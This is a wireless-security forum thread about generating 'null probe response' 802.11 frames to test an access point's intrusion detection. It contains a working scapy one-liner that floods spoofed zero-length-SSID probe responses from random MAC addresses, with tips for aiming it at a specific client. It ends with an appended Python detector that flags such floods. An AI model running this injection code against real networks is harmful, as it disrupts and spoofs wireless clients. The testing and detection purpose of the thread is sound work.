Forum

  • Hi All,

    I am trying to host a FakeAP which sends probe responses with a Null ESSID or zero-length ESSID to all the clients which send broadcast probe requests on any channel.

    I have tried the following tools with madwifi driver
    airbase-ng
    rfakeap
    rglueap

    All these tools give an option to set the ESSID on the probe responses, but they do not allow setting a Null ESSID.

    This is to generate "Null probe response" attack to test WIDS feature on the AP.

    Anyone who has done this attack before, please help me out.

    -Ravi.

  • A probe response frame always contains the SSID... well, it should.

  • By the books it should, but is it possible to create a probe response with a Null SSID?

  • If you have a coding background, airbase-ng is open-source (not sure about the others). I don't imagine it would be too tough to find the code that restricts NULL SSID in the probe response and modify it.

  • Exactly what kind of effect on clients do you expect to see?

    Unless you can change the BSSID along with every response, something like InSSIDer or Netstumbler is only going to show one entry. Even with different BSSIDs, many Windows systems will still only show you one network.

    Is this just an attempt to overflow someone's log file? An attempt to force association to a bogus AP/SSID?

  • Scapy is your friend here..... You can pretty much set any field in the 802.11 frame to whatever you like and inject it.

  • This scapy code below generates lots of Null Probe Responses :-) I have attached the pcap file which shows 4 of these frames that are generated by Scapy using the code below.... Notice the SSID is '0' - AKA a null probe response.

    from scapy.all import *  # needs scapy; the info fields are bytes on Python 3

    # One frame per loop: probe response, null (zero-length) SSID IE, random TA/BSSID
    sendp(RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=RandMAC(), addr3=RandMAC())/Dot11ProbeResp(cap="ESS")/Dot11Elt(ID="SSID", len=0, info=b"")/Dot11Elt(ID="Rates", info=b'\x82\x84\x0b\x16')/Dot11Elt(ID="DSset", info=b"\x06")/Dot11Elt(ID="TIM", info=b"\xFF\xFF\xFF\xFF"), iface="mon0", loop=1)

    Some points to note:

    1. You could/should tweak it so that it 'only' fires when it hears a Probe Request.......
    2. At present, the destination is a broadcast address, you could change it to the unicast MAC address of the client you are targeting....
    3. The TA (Transmitter Address) / SA (Source Address) and BSSID are chosen at random, you can specify MAC addresses of your own choosing here.....
    4. Some of the IE fields I set to random values, feel free to ignore them (i.e. I set the TIM to all F's....)

    Have fun.

    DJ
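A detector-side counterpart to the frames discussed in this thread, added here as an example (it is not DJ's script or any tool's code): it parses raw 802.11 probe response frames without scapy, flags any whose SSID element is empty or missing, and treats many distinct BSSIDs doing so (the per-frame RandMAC behaviour above) as the flood signature a WIDS should alert on. The frames and BSSIDs are constructed inline, not captured traffic.

```python
import struct

PROBE_RESP = 0x50  # frame-control byte 0: type 0 (management), subtype 5

def build_probe_resp(ssid: bytes, bssid: bytes) -> bytes:
    """Constructed sample frame (not captured traffic): 24-byte MAC header,
    12 bytes of fixed fields, then information elements (IEs)."""
    hdr = struct.pack("<HH6s6s6sH", PROBE_RESP, 0, b"\xff" * 6, bssid, bssid, 0)
    fixed = struct.pack("<QHH", 0, 100, 0x0001)      # timestamp, interval, ESS
    ies = bytes([0, len(ssid)]) + ssid               # SSID IE (id 0)
    ies += bytes([1, 4]) + b"\x82\x84\x0b\x16"       # supported rates
    ies += bytes([3, 1]) + b"\x06"                   # DS parameter set
    return hdr + fixed + ies

def parse_ies(body: bytes):
    """Yield (id, value) for each IE; stop quietly on a truncated element."""
    i = 0
    while i + 2 <= len(body):
        eid, ln = body[i], body[i + 1]
        if i + 2 + ln > len(body):
            break
        yield eid, body[i + 2:i + 2 + ln]
        i += 2 + ln

def null_ssid_bssid(frame: bytes):
    """Return the BSSID (hex) if this is a probe response whose SSID IE is
    empty or missing, otherwise None."""
    if len(frame) < 36 or (frame[0] & 0xFC) != PROBE_RESP:
        return None
    bssid = frame[16:22].hex(":")
    for eid, val in parse_ies(frame[36:]):
        if eid == 0:
            return bssid if len(val) == 0 else None
    return bssid  # no SSID IE at all is just as anomalous

def flag_null_probe_flood(frames, threshold=3):
    """Count distinct BSSIDs sending null probe responses: many distinct
    sources in one capture window is the flood signature."""
    bssids = {b for b in map(null_ssid_bssid, frames) if b}
    return len(bssids) >= threshold, sorted(bssids)

# Constructed input: one legitimate response plus four null-SSID responses
# from different (locally administered) BSSIDs.
SAMPLE = [build_probe_resp(b"corpnet", b"\x02\x00\x00\x00\x00\x01")] + [
    build_probe_resp(b"", bytes([0x02, 0, 0, 0, 0, n])) for n in range(2, 6)
]

if __name__ == "__main__":
    print(flag_null_probe_flood(SAMPLE))
```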
